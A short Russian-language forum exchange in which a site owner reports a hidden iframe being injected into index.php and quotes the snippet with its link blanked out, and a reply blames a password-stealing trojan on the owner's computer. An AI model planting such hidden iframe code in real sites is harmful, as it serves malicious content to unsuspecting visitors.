В index.php добавляется<html><body><div style="display:none"><iframe src="_http://_тут_ссылка" width="320" height="240"></iframe></div></body></html> ссылка там на коддавинчи правда вроде нерабочая, но сам факт неприятен пример можете посмотреть на _gorod67.ru
Ищите троянчика на своей машине, который сливает пароли сохраненные в IE хакеру. Это не трабл хостера, у меня так было. Троянчег!!!